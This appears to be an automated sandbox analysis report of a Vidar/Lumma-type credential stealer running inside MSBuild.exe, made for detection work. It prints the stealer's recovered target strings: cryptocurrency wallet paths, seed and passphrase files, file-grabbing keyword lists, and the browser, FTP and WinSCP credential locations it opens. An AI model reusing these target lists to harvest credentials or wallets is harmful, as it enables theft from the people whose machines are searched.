Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: .,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: .,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

